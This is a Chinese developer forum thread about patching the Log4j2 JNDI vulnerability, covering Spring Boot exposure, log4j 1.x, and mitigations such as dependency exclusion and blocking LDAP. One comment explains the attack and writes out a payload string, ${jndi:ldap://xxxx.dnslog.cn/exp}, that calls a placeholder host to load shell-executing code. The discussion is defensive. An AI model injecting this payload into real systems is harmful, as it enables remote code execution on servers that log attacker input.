log4j2 的漏洞大家今天晚上修复吗?

@play78 #11 可以看一下项目 maven 依赖 我看 springboot 2.x 默认使用的不是 log4j

@justs0o 最新消息： https://mp.weixin.qq.com/s/AuBchaUvFw2pisVw6rNX5A

Apache Log4j 2.15.0-rc1 版本存在漏洞绕过，请及时更新至 Apache Log4j 2.15.0-rc2 版本

@play78 不是吧 我记得 springboot 默认日志不是 slf4j + logback 么

加了环境变量了，不知道顶不顶得住。

@learningman 谁告诉你 logback 依赖 log4j 的？

@jinzhongyuan #13 通俗点说一下问题

一般代码里会记录请求参数 如登录时记录 log.info("user:{} is login", name); 这个 name 是前台传过来的参数

如果前台传的是构造的参数如： ${jndi:ldap://xxxx.dnslog.cn/exp}

exp 返回的是一个构造方法里执行 shell 代码的 class 文件

然后你设置的什么命令服务器接收到参数后就执行这个命令了

@MonkeyJon #10 spring-boot-starter-web 里面排除 log4j-to-slf4j 就好了

@aoizz 应该是

@aoizz ... 麻了，那家公司只有一个后端的，几十个工程都要处理

@arthas2234 log4j1.x 版本也可能有问题
参考 https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

@ixx 👍
感谢大佬，好像懂了

@wbd31 没用配置 jms appender ，应该就没有影响吧

@wbd31 https://github.com/apache/logging-log4j2/pull/608#issuecomment-990504842

@RuzZ 根据 quote 的内容，log4j1.x 不支持 lookup ，也找不到 JNDI 的相关引用，感觉是可以理解为 log4j 1.x 不受此次 bug 的影响

可以通过关闭日志暂时屏蔽问题么？

大厂加油

哈哈哈，非 java boy 开心吃瓜

@RuzZ #34 后续来了，1.x 也受影响。https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

@wbd31 不会吧，现在蔓延到 1.x 了么，不过我负责的项目是在内网的，还可以观望一下

@arthas2234 让网管在防火墙上把 ldap 协议禁止了。估计还可以继续苟。